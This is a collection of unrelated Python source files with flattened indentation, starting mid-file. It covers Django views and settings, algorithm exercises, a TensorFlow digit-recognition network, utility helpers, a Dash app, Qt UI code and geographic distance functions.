kwargs['instance'] = self.get_object()
return kwargs
def get_object(self):
return Output(log_frame=self.default_log_frame)
class OutputUpdate(OutputBase, UpdateView):
pass
class Overview(DetailView):
model = LogFrame
template_name = 'logframe/logframe_overview.html'
class IndicatorMonitor(UpdateView):
model = Indicator
template_name = 'logframe/indicator_monitor.html'
|
"""
Given a binary tree of integers, find the maximum path sum between two nodes. The path must go through at least one node, and does not need to go through the root.
"""
from __future__ import annotations
from math import inf
from typing import Any
class Node:
val: Any
left: Node
right: Node
def __init__(self, val: Any, left: Node = None, right: Node = None):
self.val = val
self.left = left
self.right = right
def __repr__(self):
rpz = f"Node({self.val}"
if self.left or self.right:
rpz += f", {self.left}"
if self.right:
rpz += f", {self.right}"
return rpz + ")"
def helper(root: Node) -> int:
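    # helper returns the best downward path sum that starts at `root` and takes at
    # most one child, while helper.max tracks the best "bent" path seen anywhere.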
if not root:
return 0
left, right = helper(root.left), helper(root.right)
maxLR = max(max(left, right) + root.val, root.val)
helper.max = max(helper.max, max(maxLR, left + right + root.val))
return maxLR
def maxPathSum(root: Node) -> int:
helper.max = -inf
helper(root)
return helper.max
tree = Node(-1, Node(3, Node(1)), Node(4, Node(2), Node(-2, Node(7))))
print(f"maxPathSum({tree}) = {maxPathSum(tree)}")
tree.left.left.val = 3
print(f"maxPathSum({tree}) = {maxPathSum(tree)}")
tree.val = -10
print(f"maxPathSum({tree}) = {maxPathSum(tree)}")
|
def toLetter(n):
if (n == None):
return ''
return 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'[n]
def f(nums):
order = []
firstFlag = True
while(True):
flag = False
for i,n in enumerate(nums):
if (n > 0):
order.append(i)
nums[i] -= 1
flag = True
if (firstFlag and len(nums) == 3):
firstFlag = False
order.append(None)
if (not flag):
break
if (len(order)%2 == 1):
order.append(None)
ans = []
order.reverse()
for i in range(0, len(order), 2):
ans.append(toLetter(order[i]) + (toLetter(order[i+1]) if i+1<len(order) else ''))
return ' '.join(ans)
t = int(input())
for i in range(t):
n = input()
nums = list(map(int, input().split()))
print('Case #' + str(i+1) + ':', f(nums))
|
from django.shortcuts import render
from rest_framework import generics
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from .models import Board
from .serializer import BoardSerializer
from .permissions import IsOwnerOrReadOnly
# Create your views here.
class BoardList(generics.ListCreateAPIView):
queryset = Board.objects.all()
serializer_class = BoardSerializer
class BoardDetail(generics.RetrieveUpdateDestroyAPIView):
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,IsOwnerOrReadOnly)
queryset = Board.objects.all()
serializer_class = BoardSerializer
|
t = int(input())
for cases in range(t):
n = int(input())
arr = list(map(int,input().strip().split()))
dp = [0]*(n+1)
dp[0] = 0
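    # dp[i] = best total for length i: try every first piece of length j+1
    # (worth arr[j]) and add the best result for the remaining length i-j-1.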
for i in range(1,n+1):
max_val = -2**31
for j in range(i):
max_val = max(max_val,arr[j]+dp[i-j-1])
dp[i] = max_val
print(dp[n])
|
import pygame
import numpy as np
from ... import twist
from ..objects import PySceneImage
from .base import create_surface, ButtonStyle
from .style_color import color_tones
class ClassicButtonStyle(ButtonStyle):
def __init__(self, color, disabled_color, reverse=False, intensity=12, border=3):
self.border = border
self.reverse = reverse
self.intensity = intensity
self.color = twist.color(color)
self.disabled_color = twist.color(disabled_color)
def get_image(self, rect):
self.rect = rect
return self.build_simple()
def build_simple(self):
bright, normal, dark = map(twist.color, color_tones(self.color, self.intensity))
return PySceneImage(
self.create_simple(normal),
self.create_simple(bright),
self.create_simple(normal, True),
self.create_simple(self.disabled_color),
)
def create_simple(self, color, reverse=False):
bright, normal, dark = map(twist.color, color_tones(color, self.intensity))
bright_decimal = np.sum(np.array(bright) << np.array((16, 8, 0, 24)))
dark_decimal = np.sum(np.array(dark) << np.array((16, 8, 0, 24)))
image = create_surface(normal, self.rect.size)
array = pygame.surfarray.pixels2d(image)
w, h = array.shape
for y in range(self.border):
for x in range(y, w - y):
if reverse:
array[x][y] = dark_decimal
array[x][h - y - 1] = bright_decimal
else:
array[x][y] = bright_decimal
array[x][h - y - 1] = dark_decimal
for x in range(self.border):
for y in range(x, h - x):
if reverse:
array[x][y] = dark_decimal
array[w - x - 1][y] = bright_decimal
else:
array[x][y] = bright_decimal
array[w - x - 1][y] = dark_decimal
return image
|
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Common utility functions
import datetime
import json
import time
from binascii import b2a_hex, a2b_hex
from Crypto.Cipher import AES
# JSON encoder that is also compatible with datetime objects
class DateEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.strftime('%Y-%m-%d %H:%M:%S')
elif isinstance(obj, datetime.date):
return obj.strftime('%Y-%m-%d')
else:
return json.JSONEncoder.default(self, obj)
# JSON encode
def json_encode(data):
return json.dumps(data, cls=DateEncoder)
# JSON decode
def json_decode(json_data):
return json.loads(json_data)
# Get the time n days ago; n>0 gives a time in the past, n<0 a time in the future
def get_days_before(n=0, format="%Y-%m-%d %H:%M:%S"):
now = datetime.datetime.now()
days_before = now - datetime.timedelta(days=n)
ret_time = datetime.datetime(days_before.year, days_before.month, days_before.day, days_before.hour, days_before.minute, days_before.second)
return ret_time.strftime(format)
# Get the time n hours ago; n>0 gives a time in the past, n<0 a time in the future
def get_time_before_hour(hours, is_format=True, format='%Y-%m-%d %H:%M:%S'):
hours = int(hours)
t = time.time() - hours*60*60
if is_format:
t = time.strftime(format, time.localtime(t))
return t
def aes_encrypt(val, key, mode=AES.MODE_CBC):
cryptor = AES.new(key, mode, key)
length = 16
count = len(val)
if (count % length != 0):
add = length - (count % length)
else:
add = 0
val = val + ('\0' * add)
ret = cryptor.encrypt(val)
return b2a_hex(ret).decode('utf-8')
def aes_decrypt(val, key, mode=AES.MODE_CBC):
cryptor = AES.new(key, mode, key)
val = cryptor.decrypt(a2b_hex(val))
return val.decode('utf-8').rstrip('\0')
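# Illustrative usage only (not part of the original module). The key doubles as the IV,
# so it must be exactly 16 characters for AES-128 in CBC mode, e.g.:
#   token = aes_encrypt('secret message', '0123456789abcdef')
#   plain = aes_decrypt(token, '0123456789abcdef')  # -> 'secret message'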
from tornado.httpclient import AsyncHTTPClient, HTTPRequest, HTTPResponse
from six.moves.urllib.parse import urlencode
# Async GET
async def async_get(url, params={}, responce_type='json', timeout=3):
http_client = AsyncHTTPClient()
if params:
params = urlencode(dict((k, v) for k, v in params.items()))
_url = '{0}?{1}'.format(url, params)
else :
_url = url
req = HTTPRequest(
url = _url,
method = "GET",
request_timeout = timeout
)
res = await http_client.fetch(req)
if res.error is not None:
return
if responce_type == 'json':
body = res.body.decode('utf-8')
res = json_decode(body)
return res
# Async POST
async def async_post(url, params, responce_type='json', timeout=3):
http_client = AsyncHTTPClient()
params = json_encode(params)
req = HTTPRequest(
url = url,
method = "POST",
body = params,
request_timeout = timeout
)
res = await http_client.fetch(req)
print (res.body.decode('utf-8'))
if res.error is not None:
return
if responce_type == 'json':
body = res.body.decode('utf-8')
res = json_decode(body)
return res |
import os
SOCIAL_AUTH_USER_MODEL='users.AuthUser'
SOCIAL_AUTH_LOGIN_URL= '/'
SOCIAL_AUTH_LOGIN_REDIRECT_URL='/'
SOCIAL_AUTH_LOGIN_ERROR_URL='/accounts/login-error/'
SOCIAL_AUTH_NEW_USER_REDIRECT_URL = '/accounts/register/'
SOCIAL_AUTH_NEW_ASSOCIATION_REDIRECT_URL = '/accounts/register/'
SOCIAL_AUTH_FACEBOOK_KEY = os.environ.get('FACEBOOK_KEY')
SOCIAL_AUTH_FACEBOOK_SECRET = os.environ.get('FACEBOOK_SECRET')
SOCIAL_AUTH_FACEBOOK_SCOPE = ['email']
SOCIAL_AUTH_FACEBOOK_PROFILE_EXTRA_PARAMS = {
'fields': 'id,name,email',
}
SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = os.environ.get('GOOGLE_KEY')
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = os.environ.get('GOOGLE_SECRET')
SOCIAL_AUTH_GOOGLE_OAUTH2_SCOPE = ['email'] |
import os
import numpy as np
#import matplotlib.pyplot as plt
import data_loader
import tensorflow as tf
import tensorflow.contrib.slim as slim
from sklearn.model_selection import train_test_split
image_size = 32
cropped_size = 28
num_channels = 1
pixel_depth = 255
num_labels = 5
num_digits = 10
depth = 32
patch_size_1 = 1
patch_size_3 = 3
patch_size_5 = 5
patch_size_7 = 7
train_data, train_labels, valid_data, valid_labels = data_loader.load_data()
print("Train data", train_data.shape)
print("Train labels", train_labels.shape)
print("Valid data", valid_data.shape)
print("Valid labels", valid_labels.shape)
def accuracy(labels, predictions):
return (100.0 * np.sum(np.argmax(predictions, 1) == labels) / predictions.shape[0])
def TrainConvNet():
def LecunLCN(X, image_shape, threshold=1e-4, radius=7, use_divisor=True):
"""Local Contrast Normalization"""
"""[http://yann.lecun.com/exdb/publis/pdf/jarrett-iccv-09.pdf]"""
# Get Gaussian filter
filter_shape = (radius, radius, image_shape[3], 1)
#self.filters = theano.shared(self.gaussian_filter(filter_shape), borrow=True)
filters = gaussian_filter(filter_shape)
X = tf.convert_to_tensor(X, dtype=tf.float32)
        # Compute the Gaussian weighted average by means of convolution
convout = tf.nn.conv2d(X, filters, [1,1,1,1], 'SAME')
# Subtractive step
mid = int(np.floor(filter_shape[1] / 2.))
# Make filter dimension broadcastable and subtract
centered_X = tf.subtract(X, convout)
# Boolean marks whether or not to perform divisive step
if use_divisor:
# Note that the local variances can be computed by using the centered_X
# tensor. If we convolve this with the mean filter, that should give us
# the variance at each point. We simply take the square root to get our
# denominator
# Compute variances
sum_sqr_XX = tf.nn.conv2d(tf.square(centered_X), filters, [1,1,1,1], 'SAME')
# Take square root to get local standard deviation
denom = tf.sqrt(sum_sqr_XX)
per_img_mean = tf.reduce_mean(denom)
divisor = tf.maximum(per_img_mean, denom)
            # Divisive step
new_X = tf.truediv(centered_X, tf.maximum(divisor, threshold))
else:
new_X = centered_X
return new_X
def gaussian_filter(kernel_shape):
x = np.zeros(kernel_shape, dtype = float)
mid = np.floor(kernel_shape[0] / 2.)
for kernel_idx in range(0, kernel_shape[2]):
for i in range(0, kernel_shape[0]):
for j in range(0, kernel_shape[1]):
x[i, j, kernel_idx, 0] = gauss(i - mid, j - mid)
return tf.convert_to_tensor(x / np.sum(x), dtype=tf.float32)
def gauss(x, y, sigma=3.0):
Z = 2 * np.pi * sigma ** 2
return 1. / Z * np.exp(-(x ** 2 + y ** 2) / (2. * sigma ** 2))
def weight_layer(name, shape):
return tf.get_variable(name, shape, initializer=tf.contrib.layers.xavier_initializer())
def bias_variable(name, shape):
return tf.get_variable(name, shape, initializer=tf.contrib.layers.xavier_initializer())
def conv2d_relu(input, weights, bias):
return tf.nn.relu(tf.nn.conv2d(input, weights, [1,1,1,1], padding="SAME") + bias)
def max_pool_2x2(input):
return tf.nn.max_pool(input, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
graph = tf.Graph()
with graph.as_default():
input = tf.placeholder(tf.float32, shape=(None, image_size, image_size, num_channels), name="input")
labels = tf.placeholder(tf.int32, shape=(None), name="labels")
keep_prob = tf.placeholder(tf.float32, shape=(), name="keep_prob")
learning_rate = tf.placeholder(tf.float32, shape=(), name="learning_rate")
LCN = LecunLCN(input, (None, image_size, image_size, num_channels))
with slim.arg_scope([slim.conv2d, slim.max_pool2d], stride=1, padding='SAME'):
net = slim.conv2d(LCN, 64, [3,3])
net = slim.conv2d(net, 64, [3,3])
#Inception Module 1
branch_0 = slim.conv2d(net, 64, [1, 1])
branch_1 = slim.conv2d(net, 96, [1, 1])
branch_1 = slim.conv2d(branch_1, 128, [3, 3])
branch_2 = slim.conv2d(net, 16, [1, 1])
branch_2 = slim.conv2d(branch_2, 32, [3, 3])
branch_3 = slim.max_pool2d(net, [5, 5])
branch_3 = slim.conv2d(branch_3, 32, [1, 1])
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
#Inception Module 2
branch_0 = slim.conv2d(net, 128, [1, 1])
branch_1 = slim.conv2d(net, 128, [1, 1])
branch_1 = slim.conv2d(branch_1, 192, [3, 3])
branch_2 = slim.conv2d(net, 32, [1, 1])
branch_2 = slim.conv2d(branch_2, 96, [5, 5])
branch_3 = slim.max_pool2d(net, [3, 3])
branch_3 = slim.conv2d(branch_3, 64, [1, 1])
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
#MaxPool
net = slim.max_pool2d(net, [3,3], stride=2)
#Inception Module 3
branch_0 = slim.conv2d(net, 192, [1, 1])
branch_1 = slim.conv2d(net, 96, [1, 1])
branch_1 = slim.conv2d(branch_1, 208, [3, 3])
branch_2 = slim.conv2d(net, 16, [1, 1])
branch_2 = slim.conv2d(branch_2, 48, [5, 5])
branch_3 = slim.max_pool2d(net, [3, 3])
branch_3 = slim.conv2d(branch_3, 64, [1, 1])
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
#Inception Module 4
branch_0 = slim.conv2d(net, 160, [1, 1])
branch_1 = slim.conv2d(net, 112, [1, 1])
branch_1 = slim.conv2d(branch_1, 224, [3, 3])
branch_2 = slim.conv2d(net, 24, [1, 1])
branch_2 = slim.conv2d(branch_2, 64, [5, 5])
branch_3 = slim.max_pool2d(net, [3, 3])
branch_3 = slim.conv2d(branch_3, 64, [1, 1])
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
#MaxPool and 1x1 Conv to reduce dimensions
net = slim.max_pool2d(net, [3,3], stride=2)
net = slim.conv2d(net, 128, [1,1])
#Two Fully Connected
shape = net.get_shape().as_list()
reshape = tf.reshape(net, [-1, shape[1] * shape[2] * shape[3]])
fc = slim.fully_connected(reshape, 1024)
fc = slim.fully_connected(fc, 1024)
logits = slim.fully_connected(fc, 10)
cost = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits))
train_prediction = tf.nn.softmax(logits)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
with tf.Session(graph=graph) as session:
writer = tf.summary.FileWriter("/tmp/svhn_single")
writer.add_graph(session.graph)
num_steps = 60000
batch_size = 64
tf.global_variables_initializer().run()
print("Initialized")
lr = 0.0001
for step in range(num_steps):
offset = (step * batch_size) % (train_labels.shape[0] - batch_size)
batch_data = train_data[offset:(offset + batch_size), :, :]
batch_labels = np.squeeze(train_labels[offset:(offset + batch_size), :])
feed_dict = {input : batch_data, labels : batch_labels, keep_prob : 0.5, learning_rate: lr}
if step % 10000 == 0:
lr = lr / 2
print("Learning Rate: ", lr)
if step % 500 == 0:
_, l, predictions, = session.run([optimizer, cost, train_prediction], feed_dict=feed_dict)
print('Minibatch loss at step %d: %f' % (step, l))
print('Minibatch accuracy: %.1f%%' % accuracy(batch_labels, predictions))
#Validation
v_steps = 10
v_batch_size = int(valid_data.shape[0] / v_steps)
v_preds = np.zeros((valid_labels.shape[0], num_digits))
for v_step in range(v_steps):
v_offset = (v_step * v_batch_size)
v_batch_data = valid_data[v_offset:(v_offset + v_batch_size), :, :]
v_batch_labels = np.squeeze(valid_labels[v_offset:(v_offset + v_batch_size),:])
feed_dict = {input : v_batch_data, labels : v_batch_labels, keep_prob : 1.0, learning_rate: lr}
l, predictions = session.run([cost, train_prediction], feed_dict=feed_dict)
v_preds[v_offset: v_offset + predictions.shape[0],:] = predictions
#If we missed any validation images at the end, process them now
if v_steps * v_batch_size < valid_data.shape[0]:
v_offset = (v_steps * v_batch_size)
v_batch_data = valid_data[v_offset:valid_data.shape[0] , :, :, :]
v_batch_labels = np.squeeze(valid_labels[v_offset:valid_data.shape[0],:])
feed_dict = {input : v_batch_data, labels : v_batch_labels, keep_prob : 1.0, learning_rate: lr}
                    l, predictions = session.run([cost, train_prediction], feed_dict=feed_dict)
v_preds[v_offset: v_offset + predictions.shape[0],:] = predictions
print('Valid accuracy: %.1f%%' % accuracy(np.squeeze(valid_labels), v_preds))
else:
_, l, predictions, = session.run([optimizer, cost, train_prediction], feed_dict=feed_dict)
TrainConvNet()
|
from System import DateTime
def UpdateTOF():
"""
<Script>
<Author>ANK</Author>
<Description>This script modifies scenario dates </Description>
</Script>
"""
scenarioFullPath = "/Group of cali/cali/Scenario of cali"
TOF = DateTime(2014,2,1)
SOS = TOF.AddDays(-1)
EOS = TOF.AddDays(1)
scmgr = app.Modules.Get("Scenario Manager")
scenario = scmgr.ScenarioList.Fetch(scenarioFullPath);
    # first make sure we can set the dates without conflict (must have SOS <= TOF <= EOS)
scenario.SimulationStartDate = DateTime.MinValue
scenario.SimulationTimeOfForecast = DateTime.MinValue
scenario.SimulationEndDate = DateTime.MinValue
# then set the dates
scenario.SimulationEndDate = EOS
scenario.SimulationTimeOfForecast = TOF
scenario.SimulationStartDate = SOS
# write changes to the database
scmgr.ScenarioList.Update (scenario);
|
import utils
import sorts
bookshelf = utils.load_books('books_small.csv')
for book in bookshelf:
print(book)
def by_title_ascending(book_a, book_b):
return book_a['title_lower'] > book_b['title_lower']
#if (book_a['title_lower'] > book_b['title_lower']):
# return True
#return False
sort_1 = sorts.bubble_sort(bookshelf, by_title_ascending)
for book in sort_1:
print(book['title'])
def by_author_ascending(book_a, book_b):
return book_a['author_lower'] > book_b['author_lower']
def by_total_length(book_a, book_b):
a = len(book_a['title_lower']) + len(book_a['author_lower'])
b = len(book_b['title_lower']) + len(book_b['author_lower'])
return a > b
bookshelf_v1 = bookshelf[:]
sort_2 = sorts.bubble_sort(bookshelf, by_author_ascending)
for book in sort_2:
print(book['author'])
bookshelf_v2 = bookshelf[:]
sorts.quicksort(bookshelf_v2, 0, (len(bookshelf_v2)-1), by_author_ascending)
for book in bookshelf_v2:
print(book['author'])
long_bookshelf = utils.load_books('books_large.csv')
# This one runs slowly because bubble sort is quadratic and the list is mostly unsorted
sort_3 = sorts.bubble_sort(long_bookshelf, by_total_length)
print(sort_3)
sorts.quicksort(long_bookshelf, 0, len(long_bookshelf)-1, by_total_length)
print(long_bookshelf)
|
fh=open("File_name.fasta")
count=0
num=0
for line in fh:
if line.startswith(">"):continue
line=line.rstrip()
print(">"+str(num)+"|0|training") #|1| for negetive files
print(line)
count+=1
num+=1
print(count) |
############################################
# Copyright (c) 2012 Microsoft Corporation
#
# Z3 Python interface for Z3 polynomials
#
# Author: Leonardo de Moura (leonardo)
############################################
from .z3 import *
def subresultants(p, q, x):
"""
Return the non-constant subresultants of 'p' and 'q' with respect to the "variable" 'x'.
'p', 'q' and 'x' are Z3 expressions where 'p' and 'q' are arithmetic terms.
    Note that any subterm that cannot be viewed as a polynomial is assumed to be a variable.
    Example: f(a) is considered to be a variable b in the polynomial
f(a)*f(a) + 2*f(a) + 1
>>> x, y = Reals('x y')
>>> subresultants(2*x + y, 3*x - 2*y + 2, x)
[-7*y + 4]
>>> r = subresultants(3*y*x**2 + y**3 + 1, 2*x**3 + y + 3, x)
>>> r[0]
4*y**9 + 12*y**6 + 27*y**5 + 162*y**4 + 255*y**3 + 4
>>> r[1]
-6*y**4 + -6*y
"""
return AstVector(Z3_polynomial_subresultants(p.ctx_ref(), p.as_ast(), q.as_ast(), x.as_ast()), p.ctx)
if __name__ == "__main__":
import doctest
if doctest.testmod().failed:
exit(1)
|
# Time O(n^2), space O(n)
from typing import List
class Solution:
def findCircleNum(self, M: List[List[int]]) -> int:
ctr = 0
visited = set()
for i in range(len(M)):
if i not in visited:
ctr += 1
self.visit(i, visited, M)
return ctr
def visit(self, i, visited, M):
visited.add(i)
for j in range(len(M[i])):
if M[i][j] and j not in visited:
self.visit(j, visited, M) |
#!/bin/env python
#*******************************************************************************
#
# Filename : runHistCompare.py
# Description : Generating scripts for running hist compare
# Author : Yi-Mu "Enoch" Chen [ ensc@hep1.phys.ntu.edu.tw ]
#
#*******************************************************************************
import optparse
import os
import re
import subprocess
import sys
import glob
import TstarAnalysis.RunSequence.Naming as myname
import TstarAnalysis.RunSequence.Settings as mysetting
import TstarAnalysis.RunSequence.PathVars as mypath
script_template = """
#!/bin/bash
source /cvmfs/cms.cern.ch/cmsset_default.sh
cd {0}
eval `scramv1 runtime -sh`
cmsRun {0}/RunSequence/cmsrun/run_reco_compare.py Mode={1} sample={2} output={3} maxEvents=-1
cp {3} {4}
rm {3}
"""
def main():
parser = optparse.OptionParser()
parser.add_option('-i', '--inputlist', dest='input',
help='list of data sets to generate', default=None, type='string')
parser.add_option('-m', '--mode', dest='mode',
help='which mode to run with', default=None, type='string')
(opt, args) = parser.parse_args()
if not opt.input or not opt.mode:
print "Error! [input] and [mode] inputs are obligatory!"
parser.print_help()
return
with open(opt.input) as f:
dataset_list = f.readlines()
for dataset in dataset_list:
dataset = dataset.strip()
if "Tstar" not in dataset : ## Must be a tstar signal MC
print "Skipping dataset ", dataset
continue
filequery = ""
if "Muon" in opt.mode:
filequery = myname.GetEDMStoreGlob( 'tstarbaseline', dataset, "Muon")
elif "Electron" in opt.mode:
filequery = myname.GetEDMStoreGlob( 'tstarbaseline', dataset, "Electron")
else:
print "ERROR! Unrecongnized mode ", opt.mode
sys.exit(1)
# p = subprocess.Popen(
# ['/afs/cern.ch/project/eos/installation/0.3.84-aquamarine/bin/eos.select','ls',filequery],
# stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# out, err = p.communicate()
# file_master_list = [ os.path.dirname(filequery)+'/'+x for x in out.split()]
file_master_list = glob.glob( filequery )
file_chunks = [file_master_list[i:i + 3]
for i in range(0, len(file_master_list), 3)]
for index, file_list in enumerate(file_chunks):
file_list = [ 'file://'+x for x in file_list ]
sample_input = ','.join(file_list)
tempoutput = myname.GetTempOutput( 'recocomp',dataset, opt.mode,index )
storeoutput = myname.GetEDMStoreFile( 'recocomp', dataset, opt.mode, index )
script_file_name = myname.GetScriptFile( 'recocomp', dataset, opt.mode, index )
script_content = script_template.format(
mysetting.tstar_dir,
opt.mode,
sample_input,
tempoutput,
storeoutput,
)
script_file = open(script_file_name, 'w')
script_file.write(script_content)
script_file.close()
os.system("chmod +x " + script_file_name)
print "Writting into file ", script_file_name
if __name__ == "__main__":
main()
|
import dash.dependencies
import dash_html_components as html
import dash_core_components as dcc
import os
import pandas as pd
import plotly.graph_objs as go
app = dash.Dash()
app.layout = html.Div(children=[
html.Div(html.Label('Hello, what do you like to do in your free time?'),
style = {
'display': 'inline-block', 'vertical-align': 'middle',
'textAlign': 'center', 'font-size': '1.6em', 'width': '40%'
}),
html.Div(
dcc.Dropdown(
id = 'example-dropdown',
options = [
{'label': 'Read books', 'value': 'read'},
{'label': 'Bake cakes', 'value': 'bake'},
],
value = ''
), style = {
'display': 'inline-block', 'vertical-align': 'middle',
'textAlign': 'center', 'font-size': '1.6em', 'width': '40%'
}),
dcc.Graph(
id='example-plot',
figure={
'data': [
go.Bar(x=[1], y=[628], name='Paperback'),
go.Bar(x=[1], y=[796], name='Hardcover')
],
'layout': {
'title': 'Book weight in grams'
}
}
)
])
@app.callback(
dash.dependencies.Output(component_id='example-plot', component_property='figure'),
[dash.dependencies.Input(component_id='example-dropdown', component_property='value')]
)
def update_plot(choice):
    # Placeholder callback: return an empty figure until the dropdown value is wired in.
    return {'data': [], 'layout': {}}
if __name__ == '__main__':
app.run_server()
|
# Problem 4.
# Write a program that builds one multiplication from the times tables and has the user pick the answer.
# Nine integers, including the correct answer, are printed in the layout below and the user chooses one.
# The program then reports whether the chosen answer is correct.
import random
min, max = 1, 81
while True:
dan = random.randrange(9)+1
gob = random.randrange(9)+1
n = dan * gob
numlist = [random.randrange(max)+min for i in range(1, 9)]
numlist.append(n)
random.shuffle(numlist)
print()
print('{} x {} = ?'.format(dan, gob))
for i, num in enumerate(numlist):
print(num, end='\t')
if i % 3 == 2:
print()
print()
while True:
answer = input('answer :')
if n == int(answer):
            print('Correct')
print()
break
else:
            print('Wrong')
print()
if "n" == input('다음 문제를 푸시겠습니까? (y/n)'):
break
|
import json
import sys
from pathlib import Path
from loguru import logger
from typing import cast, Optional
logger.remove()
logger.add(sys.stderr, level="INFO", enqueue=True)
class Config:
"""Config system for Dataherb"""
def __init__(
self,
is_aggregated: bool = False,
config_path: Optional[Path] = None,
no_config_error: bool = False,
):
self.is_aggregated = is_aggregated
self.config_path = config_path
self.no_config_error = no_config_error
if self.config_path is None:
home = Path.home()
self.config_path = home / ".dataherb/config.json"
if not self.config_path.exists():
if self.no_config_error:
logger.error(
f"Config file {self.config_path} does not exist.\n"
f"If this is the first time you use dataherb, please run `dataherb configure` to config dataherb."
)
# self.config = self.get_config(no_config_error=self.no_config_error)
def _flora_path(self, flora, workdir: Optional[str] = None) -> Path:
"""Get the full path to the specified flora"""
if workdir is None:
workdir = self.config["WD"]
if self.is_aggregated:
which_flora_path = Path(workdir) / "flora" / Path(flora + ".json")
else:
which_flora_path = Path(workdir) / "flora" / Path(flora)
logger.debug(f"Using flora path: {which_flora_path}")
if not which_flora_path.exists():
raise Exception(f"flora config {which_flora_path} does not exist")
return which_flora_path
@property
def config(self):
"""Loads the dataherb config file.
Load the content from the specified file as the config. The config file has to be json.
"""
return self._config()
def _config(self) -> dict:
"""Loads the dataherb config file."""
config_path = cast(Path, self.config_path)
logger.debug(f"Using {config_path} as config file for dataherb")
try:
with config_path.open(mode="r") as f:
conf = json.load(f)
if not conf.get("workdir"):
logger.error(
f"Please specify working directory in the config file using the key workdir"
)
elif conf.get("workdir", "").startswith("~"):
home = Path.home()
conf["workdir"] = str(home / conf["workdir"][2:])
except json.decoder.JSONDecodeError:
logger.error(
f"Config file {config_path} is not valid json.\n"
f"Please rerun `dataherb configure` to reconfi dataherb or manually fix it."
)
conf = {}
return conf
@property
def workdir(self):
return self.config["workdir"]
@property
def flora_path(self):
return self._flora_path(
self.config.get("default", {}).get("flora"), self.config["workdir"]
)
@property
def flora(self):
return self.config.get("default", {}).get("flora")
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/rlessard/packages/omtk/0.4.999/python/omtk/ui/pluginmanager_window.ui'
#
# Created: Tue Feb 20 10:34:53 2018
# by: pyside2-uic running on Qt 2.0.0~alpha0
#
# WARNING! All changes made in this file will be lost!
from Qt import QtCore, QtGui, QtWidgets, QtCompat
class Ui_mainWindow(object):
def setupUi(self, mainWindow):
mainWindow.setObjectName("mainWindow")
mainWindow.resize(485, 391)
self.centralwidget = QtWidgets.QWidget(mainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName("verticalLayout")
self.lineEdit_search = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_search.setObjectName("lineEdit_search")
self.verticalLayout.addWidget(self.lineEdit_search)
self.tableView = QtWidgets.QTableView(self.centralwidget)
self.tableView.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.tableView.setObjectName("tableView")
self.tableView.horizontalHeader().setStretchLastSection(True)
self.verticalLayout.addWidget(self.tableView)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.pushButton_reload = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_reload.setObjectName("pushButton_reload")
self.horizontalLayout.addWidget(self.pushButton_reload)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.verticalLayout.addLayout(self.horizontalLayout)
mainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(mainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 485, 28))
self.menubar.setObjectName("menubar")
mainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(mainWindow)
self.statusbar.setObjectName("statusbar")
mainWindow.setStatusBar(self.statusbar)
self.actionReload = QtWidgets.QAction(mainWindow)
self.actionReload.setObjectName("actionReload")
self.actionSearchQueryChanged = QtWidgets.QAction(mainWindow)
self.actionSearchQueryChanged.setObjectName("actionSearchQueryChanged")
self.retranslateUi(mainWindow)
QtCore.QObject.connect(self.pushButton_reload, QtCore.SIGNAL("released()"), self.actionReload.trigger)
QtCore.QObject.connect(self.lineEdit_search, QtCore.SIGNAL("textChanged(QString)"), self.actionSearchQueryChanged.trigger)
QtCore.QMetaObject.connectSlotsByName(mainWindow)
def retranslateUi(self, mainWindow):
mainWindow.setWindowTitle(QtCompat.translate("mainWindow", "OMTK - Plugin Manager", None, -1))
self.pushButton_reload.setText(QtCompat.translate("mainWindow", "Reload", None, -1))
self.actionReload.setText(QtCompat.translate("mainWindow", "Reload", None, -1))
self.actionSearchQueryChanged.setText(QtCompat.translate("mainWindow", "SearchQueryChanged", None, -1))
|
import numpy as np
def latlong2dist(lat1, long1, lat2, long2):
"""
    https://en.wikipedia.org/wiki/Haversine_formula
    :param lat1: latitude of the first point in degrees
    :param long1: longitude of the first point in degrees
    :param lat2: latitude of the second point in degrees
    :param long2: longitude of the second point in degrees
    :return: great-circle distance between the two points in metres
"""
R = 6357000.0
dLat = (lat2 - lat1)*np.pi/180
dLong = (long2 - long1)*np.pi/180
a = np.sin(dLat/2) * np.sin(dLat/2) \
+ np.cos(lat1*np.pi/180) * np.cos(lat2*np.pi/180) * \
np.sin(dLong/2) * np.sin(dLong/2)
c = 2 * np.arctan2(np.sqrt(a), np.sqrt(1-a))
d = R * c # Distance in m
return d
def latlong2bearing(lat1, long1, lat2, long2):
"""
# https://www.igismap.com/formula-to-find-bearing-or-heading-angle-between-two-points-latitude-longitude/
# θ = atan2(sin(Δlong)*cos(lat2), cos(lat1)*sin(lat2) − sin(lat1)*cos(lat2)*cos(Δlong))
Definition of direction is the traditional North 0 deg, east 90 deg, etc.
"""
dLong = (long2 - long1)*np.pi/180
